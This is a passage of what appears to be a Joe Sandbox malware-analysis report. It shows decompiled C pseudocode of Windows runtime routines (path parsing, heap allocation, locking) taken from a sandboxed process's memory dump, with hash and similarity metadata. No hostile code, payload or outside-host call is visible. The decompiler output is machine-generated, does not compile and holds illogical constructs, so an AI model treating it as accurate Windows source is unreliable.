                            									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                            										_t254 = L037E4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                            										if(_t254 == 0) {
                            											_t169 = 0xc0000017;
                            										} else {
                            											_t298 = _v564;
                            											_v588 = _t316;
                            											_t306 = _t316;
                            											_t316 = E037E6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                            											if(_t316 != 0) {
                            												continue;
                            											} else {
                            												goto L68;
                            											}
                            										}
                            									} else {
                            										goto L90;
                            									}
                            								} else {
                            									_v556 = _t316;
                            									 *((short*)(_t329 + 0x32)) = _t233;
                            									_v552 = _t254;
                            									if(_t316 < 2) {
                            										L11:
                            										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                            											_t161 = 5;
                            										} else {
                            											if(_t316 < 6) {
                            												L87:
                            												_t161 = 3;
                            											} else {
                            												_t242 = _t254[2] & 0x0000ffff;
                            												if(_t242 != 0x5c) {
                            													if(_t242 == 0x2f) {
                            														goto L16;
                            													} else {
                            														goto L87;
                            													}
                            													goto L101;
                            												} else {
                            													L16:
                            													_t161 = 2;
                            												}
                            											}
                            										}
                            									} else {
                            										_t243 =  *_t254 & 0x0000ffff;
                            										if(_t243 == 0x5c || _t243 == 0x2f) {
                            											if(_t316 < 4) {
                            												L81:
                            												_t161 = 4;
                            												goto L17;
                            											} else {
                            												_t244 = _t254[1] & 0x0000ffff;
                            												if(_t244 != 0x5c) {
                            													if(_t244 == 0x2f) {
                            														goto L60;
                            													} else {
                            														goto L81;
                            													}
                            												} else {
                            													L60:
                            													if(_t316 < 6) {
                            														L83:
                            														_t161 = 1;
                            														goto L17;
                            													} else {
                            														_t245 = _t254[2] & 0x0000ffff;
                            														if(_t245 != 0x2e) {
                            															if(_t245 == 0x3f) {
                            																goto L62;
                            															} else {
                            																goto L83;
                            															}
                            														} else {
                            															L62:
                            															if(_t316 < 8) {
                            																L85:
                            																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                            																goto L17;
                            															} else {
                            																_t250 = _t254[3] & 0x0000ffff;
                            																if(_t250 != 0x5c) {
                            																	if(_t250 == 0x2f) {
                            																		goto L64;
                            																	} else {
                            																		goto L85;
                            																	}
                            																} else {
                            																	L64:
                            																	_t161 = 6;
                            																	goto L17;
                            																}
                            															}
                            														}
                            													}
                            												}
                            											}
                            											goto L101;
                            										} else {
                            											goto L11;
                            										}
                            									}
                            									L17:
                            									if(_t161 != 2) {
                            										_t162 = _t161 - 1;
                            										if(_t162 > 5) {
                            											goto L18;
                            										} else {
                            											switch( *((intOrPtr*)(_t162 * 4 +  &M037E45F8))) {
                            												case 0:
                            													_v568 = 0x37a1078;
                            													__eax = 2;
                            													goto L20;
                            												case 1:
                            													goto L18;
                            												case 2:
                            													_t163 = 4;
                            													goto L19;
                            											}
                            										}
                            										goto L41;
                            									} else {
                            										L18:
                            										_t163 = 0;
                            										L19:
                            										_v568 = 0x37a11c4;
                            									}
                            									L20:
                            									_v588 = _t163;
                            									_v564 = _t163 + _t163;
                            									_t306 =  *_v568 & 0x0000ffff;
                            									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                            									_v576 = _t265;
                            									if(_t265 > 0xfffe) {
                            										L90:
                            										_t322 = 0xc0000106;
                            									} else {
                            										if(_t321 != 0) {
                            											if(_t265 > (_t321[1] & 0x0000ffff)) {
                            												if(_v580 != 0) {
                            													goto L23;
                            												} else {
                            													_t322 = 0xc0000106;
                            													goto L39;
                            												}
                            											} else {
                            												_t177 = _t306;
                            												goto L25;
                            											}
                            											goto L101;
                            										} else {
                            											if(_v580 == _t321) {
                            												_t322 = 0xc000000d;
                            											} else {
                            												L23:
                            												_t173 = L037E4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                            												_t269 = _v592;
                            												_t269[2] = _t173;
                            												if(_t173 == 0) {
                            													_t322 = 0xc0000017;
                            												} else {
                            													_t316 = _v556;
                            													 *_t269 = 0;
                            													_t321 = _t269;
                            													_t269[1] = _v576;
                            													_t177 =  *_v568 & 0x0000ffff;
                            													L25:
                            													_v580 = _t177;
                            													if(_t177 == 0) {
                            														L29:
                            														_t307 =  *_t321 & 0x0000ffff;
                            													} else {
                            														_t290 =  *_t321 & 0x0000ffff;
                            														_v576 = _t290;
                            														_t310 = _t177 & 0x0000ffff;
                            														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                            															_t307 =  *_t321 & 0xffff;
                            														} else {
                            															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                            															E0380F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                            															_t329 = _t329 + 0xc;
                            															_t311 = _v580;
                            															_t225 =  *_t321 + _t311 & 0x0000ffff;
                            															 *_t321 = _t225;
                            															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                            																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                            															}
                            															goto L29;
                            														}
                            													}
                            													_t271 = _v556 - _v588 + _v588;
                            													_v580 = _t307;
                            													_v576 = _t271;
                            													if(_t271 != 0) {
                            														_t308 = _t271 & 0x0000ffff;
                            														_v588 = _t308;
                            														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                            															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                            															E0380F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                            															_t329 = _t329 + 0xc;
                            															_t213 =  *_t321 + _v576 & 0x0000ffff;
                            															 *_t321 = _t213;
                            															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                            																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                            															}
                            														}
                            													}
                            													_t272 = _v560;
                            													if(_t272 != 0) {
                            														 *_t272 = _t321;
                            													}
                            													_t306 = 0;
                            													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                            													_t275 = _v572;
                            													if(_t275 != 0) {
                            														_t306 =  *_t275;
                            														if(_t306 != 0) {
                            															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                            														}
                            													}
                            													_t181 = _v544;
                            													if(_t181 != 0) {
                            														 *_t181 = 0;
                            														 *((intOrPtr*)(_t181 + 4)) = 0;
                            														 *((intOrPtr*)(_t181 + 8)) = 0;
                            														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                            														if(_v540 == 5) {
                            															_t182 = E037C52A5(1);
                            															_v588 = _t182;
                            															if(_t182 == 0) {
                            																E037DEB70(1, 0x38b79a0);
                            																goto L38;
                            															} else {
                            																_v560 = _t182 + 0xc;
                            																_t185 = E037DAA20( &_v556, _t182 + 0xc,  &_v556, 1);
                            																if(_t185 == 0) {
                            																	_t324 = _v588;
                            																	goto L97;
                            																} else {
                            																	_t306 = _v544;
                            																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                            																	 *(_t306 + 4) = _t282;
                            																	_v576 = _t282;
                            																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                            																	 *_t306 = _t325;
                            																	if( *_t282 == 0x5c) {
                            																		_t149 = _t325 - 2; // -2
                            																		_t283 = _t149;
                            																		 *_t306 = _t283;
                            																		 *(_t306 + 4) = _v576 + 2;
                            																		_t185 = _t283 & 0x0000ffff;
                            																	}
                            																	_t324 = _v588;
                            																	 *(_t306 + 2) = _t185;
                            																	if((_v548 & 0x00000002) == 0) {
                            																		L97:
                            																		asm("lock xadd [esi], eax");
                            																		if((_t185 | 0xffffffff) == 0) {
                            																			_push( *((intOrPtr*)(_t324 + 4)));
                            																			E038095D0();
                            																			L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                            																		}
                            																	} else {
                            																		 *(_t306 + 0xc) = _t324;
                            																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                            																	}
                            																	goto L38;
                            																}
                            															}
                            															goto L41;
                            														}
                            													}
                            													L38:
                            													_t322 = 0;
                            												}
                            											}
                            										}
                            									}
                            									L39:
                            									if(_t254 !=  &_v532) {
                            										L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                            									}
                            									_t169 = _t322;
                            								}
                            								goto L41;
                            							}
                            							goto L68;
                            						}
                            					}
                            					L41:
                            					_pop(_t317);
                            					_pop(_t323);
                            					_pop(_t255);
                            					return E0380B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                            				} else {
                            					_t299 = __edx[2];
                            					if( *_t299 == 0x5c) {
                            						_t256 =  *(_t299 + 2) & 0x0000ffff;
                            						if(_t256 != 0x5c) {
                            							if(_t256 != 0x3f) {
                            								goto L2;
                            							} else {
                            								goto L50;
                            							}
                            						} else {
                            							L50:
                            							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                            								goto L2;
                            							} else {
                            								_t251 = E03803D43(_t315, _t321, _t157, _v560, _v572, _t305);
                            								_pop(_t319);
                            								_pop(_t326);
                            								_pop(_t257);
                            								return E0380B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                            							}
                            						}
                            					} else {
                            						L2:
                            						_t260 = _v572;
                            						goto L3;
                            					}
                            				}
                            				L101:
                            			}















































































                            0x037e417b
                            0x00000000
                            0x037e417b
                            0x037e4175
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b86f4f31919732ec3521ff27173b45f955e1791ae3042b288c0ff37b26b3f65b
                            • Instruction ID: 51d7ef7284ddb70d9892a0d4c5f661bb3260fba530f9565c9b647cd5afe46cd7
                            • Opcode Fuzzy Hash: b86f4f31919732ec3521ff27173b45f955e1791ae3042b288c0ff37b26b3f65b
                            • Instruction Fuzzy Hash: 14F19C756083118BC724CF6AC484A3AF7E5FF89714F08896EF896CB290E734D881CB56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E037F20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                            				signed int _v16;
                            				signed int _v20;
                            				signed char _v24;
                            				intOrPtr _v28;
                            				signed int _v32;
                            				void* _v36;
                            				char _v48;
                            				signed int _v52;
                            				signed int _v56;
                            				unsigned int _v60;
                            				char _v64;
                            				unsigned int _v68;
                            				signed int _v72;
                            				char _v73;
                            				signed int _v74;
                            				char _v75;
                            				signed int _v76;
                            				void* _v81;
                            				void* _v82;
                            				void* _v89;
                            				void* _v92;
                            				void* _v97;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed char _t128;
                            				void* _t129;
                            				signed int _t130;
                            				void* _t132;
                            				signed char _t133;
                            				intOrPtr _t135;
                            				signed int _t137;
                            				signed int _t140;
                            				signed int* _t144;
                            				signed int* _t145;
                            				intOrPtr _t146;
                            				signed int _t147;
                            				signed char* _t148;
                            				signed int _t149;
                            				signed int _t153;
                            				signed int _t169;
                            				signed int _t174;
                            				signed int _t180;
                            				void* _t197;
                            				void* _t198;
                            				signed int _t201;
                            				intOrPtr* _t202;
                            				intOrPtr* _t205;
                            				signed int _t210;
                            				signed int _t215;
                            				signed int _t218;
                            				signed char _t221;
                            				signed int _t226;
                            				char _t227;
                            				signed int _t228;
                            				void* _t229;
                            				unsigned int _t231;
                            				void* _t235;
                            				signed int _t240;
                            				signed int _t241;
                            				void* _t242;
                            				signed int _t246;
                            				signed int _t248;
                            				signed int _t252;
                            				signed int _t253;
                            				void* _t254;
                            				intOrPtr* _t256;
                            				intOrPtr _t257;
                            				unsigned int _t262;
                            				signed int _t265;
                            				void* _t267;
                            				signed int _t275;
                            
                            				_t198 = __ebx;
                            				_t267 = (_t265 & 0xfffffff0) - 0x48;
                            				_v68 = __ecx;
                            				_v73 = 0;
                            				_t201 = __edx & 0x00002000;
                            				_t128 = __edx & 0xffffdfff;
                            				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                            				_v72 = _t128;
                            				if((_t128 & 0x00000008) != 0) {
                            					__eflags = _t128 - 8;
                            					if(_t128 != 8) {
                            						L69:
                            						_t129 = 0xc000000d;
                            						goto L23;
                            					} else {
                            						_t130 = 0;
                            						_v72 = 0;
                            						_v75 = 1;
                            						L2:
                            						_v74 = 1;
                            						_t226 =  *0x38b8714; // 0x0
                            						if(_t226 != 0) {
                            							__eflags = _t201;
                            							if(_t201 != 0) {
                            								L62:
                            								_v74 = 1;
                            								L63:
                            								_t130 = _t226 & 0xffffdfff;
                            								_v72 = _t130;
                            								goto L3;
                            							}
                            							_v74 = _t201;
                            							__eflags = _t226 & 0x00002000;
                            							if((_t226 & 0x00002000) == 0) {
                            								goto L63;
                            							}
                            							goto L62;
                            						}
                            						L3:
                            						_t227 = _v75;
                            						L4:
                            						_t240 = 0;
                            						_v56 = 0;
                            						_t252 = _t130 & 0x00000100;
                            						if(_t252 != 0 || _t227 != 0) {
                            							_t240 = _v68;
                            							_t132 = E037F2EB0(_t240);
                            							__eflags = _t132 - 2;
                            							if(_t132 != 2) {
                            								__eflags = _t132 - 1;
                            								if(_t132 == 1) {
                            									goto L25;
                            								}
                            								__eflags = _t132 - 6;
                            								if(_t132 == 6) {
                            									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                            									if( *((short*)(_t240 + 4)) != 0x3f) {
                            										goto L40;
                            									}
                            									_t197 = E037F2EB0(_t240 + 8);
                            									__eflags = _t197 - 2;
                            									if(_t197 == 2) {
                            										goto L25;
                            									}
                            								}
                            								L40:
                            								_t133 = 1;
                            								L26:
                            								_t228 = _v75;
                            								_v56 = _t240;
                            								__eflags = _t133;
                            								if(_t133 != 0) {
                            									__eflags = _t228;
                            									if(_t228 == 0) {
                            										L43:
                            										__eflags = _v72;
                            										if(_v72 == 0) {
                            											goto L8;
                            										}
                            										goto L69;
                            									}
                            									_t133 = E037C58EC(_t240);
                            									_t221 =  *0x38b5cac; // 0x16
                            									__eflags = _t221 & 0x00000040;
                            									if((_t221 & 0x00000040) != 0) {
                            										_t228 = 0;
                            										__eflags = _t252;
                            										if(_t252 != 0) {
                            											goto L43;
                            										}
                            										_t133 = _v72;
                            										goto L7;
                            									}
                            									goto L43;
                            								} else {
                            									_t133 = _v72;
                            									goto L6;
                            								}
                            							}
                            							L25:
                            							_t133 = _v73;
                            							goto L26;
                            						} else {
                            							L6:
                            							_t221 =  *0x38b5cac; // 0x16
                            							L7:
                            							if(_t133 != 0) {
                            								__eflags = _t133 & 0x00001000;
                            								if((_t133 & 0x00001000) != 0) {
                            									_t133 = _t133 | 0x00000a00;
                            									__eflags = _t221 & 0x00000004;
                            									if((_t221 & 0x00000004) != 0) {
                            										_t133 = _t133 | 0x00000400;
                            									}
                            								}
                            								__eflags = _t228;
                            								if(_t228 != 0) {
                            									_t133 = _t133 | 0x00000100;
                            								}
                            								_t229 = E03804A2C(0x38b6e40, 0x3804b30, _t133, _t240);
                            								__eflags = _t229;
                            								if(_t229 == 0) {
                            									_t202 = _a20;
                            									goto L100;
                            								} else {
                            									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                            									L15:
                            									_t202 = _a20;
                            									 *_t202 = _t135;
                            									if(_t229 == 0) {
                            										L100:
                            										 *_a4 = 0;
                            										_t137 = _a8;
                            										__eflags = _t137;
                            										if(_t137 != 0) {
                            											 *_t137 = 0;
                            										}
                            										 *_t202 = 0;
                            										_t129 = 0xc0000017;
                            										goto L23;
                            									} else {
                            										_t242 = _a16;
                            										if(_t242 != 0) {
                            											_t254 = _t229;
                            											memcpy(_t242, _t254, 0xd << 2);
                            											_t267 = _t267 + 0xc;
                            											_t242 = _t254 + 0x1a;
                            										}
                            										_t205 = _a4;
                            										_t25 = _t229 + 0x48; // 0x48
                            										 *_t205 = _t25;
                            										_t140 = _a8;
                            										if(_t140 != 0) {
                            											__eflags =  *((char*)(_t267 + 0xa));
                            											if( *((char*)(_t267 + 0xa)) != 0) {
                            												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                            											} else {
                            												 *_t140 = 0;
                            											}
                            										}
                            										_t256 = _a12;
                            										if(_t256 != 0) {
                            											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                            										}
                            										_t257 =  *_t205;
                            										_v48 = 0;
                            										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                            										_v56 = 0;
                            										_v52 = 0;
                            										_t144 =  *( *[fs:0x30] + 0x50);
                            										if(_t144 != 0) {
                            											__eflags =  *_t144;
                            											if( *_t144 == 0) {
                            												goto L20;
                            											}
                            											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                            											goto L21;
                            										} else {
                            											L20:
                            											_t145 = 0x7ffe0384;
                            											L21:
                            											if( *_t145 != 0) {
                            												_t146 =  *[fs:0x30];
                            												__eflags =  *(_t146 + 0x240) & 0x00000004;
                            												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                            													_t147 = E037E7D50();
                            													__eflags = _t147;
                            													if(_t147 == 0) {
                            														_t148 = 0x7ffe0385;
                            													} else {
                            														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                            													}
                            													__eflags =  *_t148 & 0x00000020;
                            													if(( *_t148 & 0x00000020) != 0) {
                            														_t149 = _v72;
                            														__eflags = _t149;
                            														if(__eflags == 0) {
                            															_t149 = 0x37a5c80;
                            														}
                            														_push(_t149);
                            														_push( &_v48);
                            														 *((char*)(_t267 + 0xb)) = E037FF6E0(_t198, _t242, _t257, __eflags);
                            														_push(_t257);
                            														_push( &_v64);
                            														_t153 = E037FF6E0(_t198, _t242, _t257, __eflags);
                            														__eflags =  *((char*)(_t267 + 0xb));
                            														if( *((char*)(_t267 + 0xb)) != 0) {
                            															__eflags = _t153;
                            															if(_t153 != 0) {
                            																__eflags = 0;
                            																E03847016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                            																L037E2400(_t267 + 0x20);
                            															}
                            															L037E2400( &_v64);
                            														}
                            													}
                            												}
                            											}
                            											_t129 = 0;
                            											L23:
                            											return _t129;
                            										}
                            									}
                            								}
                            							}
                            							L8:
                            							_t275 = _t240;
                            							if(_t275 != 0) {
                            								_v73 = 0;
                            								_t253 = 0;
                            								__eflags = 0;
                            								L29:
                            								_push(0);
                            								_t241 = E037F2397(_t240);
                            								__eflags = _t241;
                            								if(_t241 == 0) {
                            									_t229 = 0;
                            									L14:
                            									_t135 = 0;
                            									goto L15;
                            								}
                            								__eflags =  *((char*)(_t267 + 0xb));
                            								 *(_t241 + 0x34) = 1;
                            								if( *((char*)(_t267 + 0xb)) != 0) {
                            									E037E2280(_t134, 0x38b8608);
                            									__eflags =  *0x38b6e48 - _t253; // 0x0
                            									if(__eflags != 0) {
                            										L48:
                            										_t253 = 0;
                            										__eflags = 0;
                            										L49:
                            										E037DFFB0(_t198, _t241, 0x38b8608);
                            										__eflags = _t253;
                            										if(_t253 != 0) {
                            											L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                            										}
                            										goto L31;
                            									}
                            									 *0x38b6e48 = _t241;
                            									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                            									__eflags = _t253;
                            									if(_t253 != 0) {
                            										_t57 = _t253 + 0x34;
                            										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                            										__eflags =  *_t57;
                            										if( *_t57 == 0) {
                            											goto L49;
                            										}
                            									}
                            									goto L48;
                            								}
                            								L31:
                            								_t229 = _t241;
                            								goto L14;
                            							}
                            							_v73 = 1;
                            							_v64 = _t240;
                            							asm("lock bts dword [esi], 0x0");
                            							if(_t275 < 0) {
                            								_t231 =  *0x38b8608; // 0x0
                            								while(1) {
                            									_v60 = _t231;
                            									__eflags = _t231 & 0x00000001;
                            									if((_t231 & 0x00000001) != 0) {
                            										goto L76;
                            									}
                            									_t73 = _t231 + 1; // 0x1
                            									_t210 = _t73;
                            									asm("lock cmpxchg [edi], ecx");
                            									__eflags = _t231 - _t231;
                            									if(_t231 != _t231) {
                            										L92:
                            										_t133 = E037F6B90(_t210,  &_v64);
                            										_t262 =  *0x38b8608; // 0x0
                            										L93:
                            										_t231 = _t262;
                            										continue;
                            									}
                            									_t240 = _v56;
                            									goto L10;
                            									L76:
                            									_t169 = E037FE180(_t133);
                            									__eflags = _t169;
                            									if(_t169 != 0) {
                            										_push(0xc000004b);
                            										_push(0xffffffff);
                            										E038097C0();
                            										_t231 = _v68;
                            									}
                            									_v72 = 0;
                            									_v24 =  *( *[fs:0x18] + 0x24);
                            									_v16 = 3;
                            									_v28 = 0;
                            									__eflags = _t231 & 0x00000002;
                            									if((_t231 & 0x00000002) == 0) {
                            										_v32 =  &_v36;
                            										_t174 = _t231 >> 4;
                            										__eflags = 1 - _t174;
                            										_v20 = _t174;
                            										asm("sbb ecx, ecx");
                            										_t210 = 3 |  &_v36;
                            										__eflags = _t174;
                            										if(_t174 == 0) {
                            											_v20 = 0xfffffffe;
                            										}
                            									} else {
                            										_v32 = 0;
                            										_v20 = 0xffffffff;
                            										_v36 = _t231 & 0xfffffff0;
                            										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                            										_v72 =  !(_t231 >> 2) & 0xffffff01;
                            									}
                            									asm("lock cmpxchg [edi], esi");
                            									_t262 = _t231;
                            									__eflags = _t262 - _t231;
                            									if(_t262 != _t231) {
                            										goto L92;
                            									} else {
                            										__eflags = _v72;
                            										if(_v72 != 0) {
                            											E0380006A(0x38b8608, _t210);
                            										}
                            										__eflags =  *0x7ffe036a - 1;
                            										if(__eflags <= 0) {
                            											L89:
                            											_t133 =  &_v16;
                            											asm("lock btr dword [eax], 0x1");
                            											if(__eflags >= 0) {
                            												goto L93;
                            											} else {
                            												goto L90;
                            											}
                            											do {
                            												L90:
                            												_push(0);
                            												_push(0x38b8608);
                            												E0380B180();
                            												_t133 = _v24;
                            												__eflags = _t133 & 0x00000004;
                            											} while ((_t133 & 0x00000004) == 0);
                            											goto L93;
                            										} else {
                            											_t218 =  *0x38b6904; // 0x400
                            											__eflags = _t218;
                            											if(__eflags == 0) {
                            												goto L89;
                            											} else {
                            												goto L87;
                            											}
                            											while(1) {
                            												L87:
                            												__eflags = _v16 & 0x00000002;
                            												if(__eflags == 0) {
                            													goto L89;
                            												}
                            												asm("pause");
                            												_t218 = _t218 - 1;
                            												__eflags = _t218;
                            												if(__eflags != 0) {
                            													continue;
                            												}
                            												goto L89;
                            											}
                            											goto L89;
                            										}
                            									}
                            								}
                            							}
                            							L10:
                            							_t229 =  *0x38b6e48; // 0x0
                            							_v72 = _t229;
                            							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                            								E037DFFB0(_t198, _t240, 0x38b8608);
                            								_t253 = _v76;
                            								goto L29;
                            							} else {
                            								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                            								asm("lock cmpxchg [esi], ecx");
                            								_t215 = 1;
                            								if(1 != 1) {
                            									while(1) {
                            										_t246 = _t215 & 0x00000006;
                            										_t180 = _t215;
                            										__eflags = _t246 - 2;
                            										_v56 = _t246;
                            										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                            										asm("lock cmpxchg [edi], esi");
                            										_t248 = _v56;
                            										__eflags = _t180 - _t215;
                            										if(_t180 == _t215) {
                            											break;
                            										}
                            										_t215 = _t180;
                            									}
                            									__eflags = _t248 - 2;
                            									if(_t248 == 2) {
                            										__eflags = 0;
                            										E038000C2(0x38b8608, 0, _t235);
                            									}
                            									_t229 = _v72;
                            								}
                            								goto L14;
                            							}
                            						}
                            					}
                            				}
                            				_t227 = 0;
                            				_v75 = 0;
                            				if(_t128 != 0) {
                            					goto L4;
                            				}
                            				goto L2;
                            			}












































































                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fbecb6697e542191d6f2017c925eca07708c595629c4ad13d259b586ba1643e3
                            • Instruction ID: 300cb7a510998fe15bef3a5015267f3625b0f69deec11c7843c3cf8adfbb183c
                            • Opcode Fuzzy Hash: fbecb6697e542191d6f2017c925eca07708c595629c4ad13d259b586ba1643e3
                            • Instruction Fuzzy Hash: 44F147396083459FDB25DF68C84076BB7E5BF86324F08899DEA95CB391D734D840CB82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E037DD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                            				signed int _v8;
                            				intOrPtr _v20;
                            				signed int _v36;
                            				intOrPtr* _v40;
                            				signed int _v44;
                            				signed int _v48;
                            				signed char _v52;
                            				signed int _v60;
                            				signed int _v64;
                            				signed int _v68;
                            				signed int _v72;
                            				signed int _v76;
                            				intOrPtr _v80;
                            				signed int _v84;
                            				intOrPtr _v100;
                            				intOrPtr _v104;
                            				signed int _v108;
                            				signed int _v112;
                            				signed int _v116;
                            				intOrPtr _v120;
                            				signed int _v132;
                            				char _v140;
                            				char _v144;
                            				char _v157;
                            				signed int _v164;
                            				signed int _v168;
                            				signed int _v169;
                            				intOrPtr _v176;
                            				signed int _v180;
                            				intOrPtr _v184;
                            				intOrPtr _v188;
                            				signed int _v192;
                            				signed int _v200;
                            				signed int _v208;
                            				intOrPtr* _v212;
                            				char _v216;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t204;
                            				signed int _t206;
                            				void* _t208;
                            				signed int _t211;
                            				signed int _t216;
                            				intOrPtr _t217;
                            				intOrPtr* _t218;
                            				signed int _t226;
                            				signed int _t239;
                            				signed int* _t247;
                            				signed int _t249;
                            				void* _t252;
                            				signed int _t256;
                            				signed int _t269;
                            				signed int _t271;
                            				signed int _t277;
                            				intOrPtr _t279;
                            				intOrPtr _t283;
                            				signed int _t287;
                            				signed int _t288;
                            				void* _t289;
                            				signed char _t290;
                            				signed int _t292;
                            				signed int* _t293;
                            				unsigned int _t297;
                            				signed int _t306;
                            				signed int _t307;
                            				signed int _t308;
                            				signed int _t309;
                            				signed int _t310;
                            				intOrPtr _t311;
                            				intOrPtr _t312;
                            				signed int _t319;
                            				intOrPtr _t320;
                            				signed int* _t324;
                            				signed int _t337;
                            				signed int _t338;
                            				signed int _t339;
                            				intOrPtr* _t340;
                            				void* _t341;
                            				signed int _t344;
                            				signed int _t348;
                            				signed int _t349;
                            				signed int _t351;
                            				intOrPtr _t353;
                            				void* _t354;
                            				signed int _t356;
                            				signed int _t358;
                            				intOrPtr _t359;
                            				signed int _t361;
                            				signed int _t363;
                            				signed short* _t365;
                            				void* _t367;
                            				intOrPtr _t369;
                            				void* _t370;
                            				signed int _t371;
                            				signed int _t372;
                            				void* _t374;
                            				signed int _t376;
                            				void* _t384;
                            				signed int _t387;
                            
                            				_v8 =  *0x38bd360 ^ _t376;
                            				_t2 =  &_a20;
                            				 *_t2 = _a20 & 0x00000001;
                            				_t287 = _a4;
                            				_v200 = _a12;
                            				_t365 = _a8;
                            				_v212 = _a16;
                            				_v180 = _a24;
                            				_v168 = 0;
                            				_v157 = 0;
                            				if( *_t2 != 0) {
                            					__eflags = E037D6600(0x38b52d8);
                            					if(__eflags == 0) {
                            						goto L1;
                            					} else {
                            						_v188 = 6;
                            					}
                            				} else {
                            					L1:
                            					_v188 = 9;
                            				}
                            				if(_t365 == 0) {
                            					_v164 = 0;
                            					goto L5;
                            				} else {
                            					_t363 =  *_t365 & 0x0000ffff;
                            					_t341 = _t363 + 1;
                            					if((_t365[1] & 0x0000ffff) < _t341) {
                            						L109:
                            						__eflags = _t341 - 0x80;
                            						if(_t341 <= 0x80) {
                            							_t281 =  &_v140;
                            							_v164 =  &_v140;
                            							goto L114;
                            						} else {
                            							_t283 =  *0x38b7b9c; // 0x0
                            							_t281 = L037E4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                            							_v164 = _t281;
                            							__eflags = _t281;
                            							if(_t281 != 0) {
                            								_v157 = 1;
                            								L114:
                            								E0380F3E0(_t281, _t365[2], _t363);
                            								_t200 = _v164;
                            								 *((char*)(_v164 + _t363)) = 0;
                            								goto L5;
                            							} else {
                            								_t204 = 0xc000009a;
                            								goto L47;
                            							}
                            						}
                            					} else {
                            						_t200 = _t365[2];
                            						_v164 = _t200;
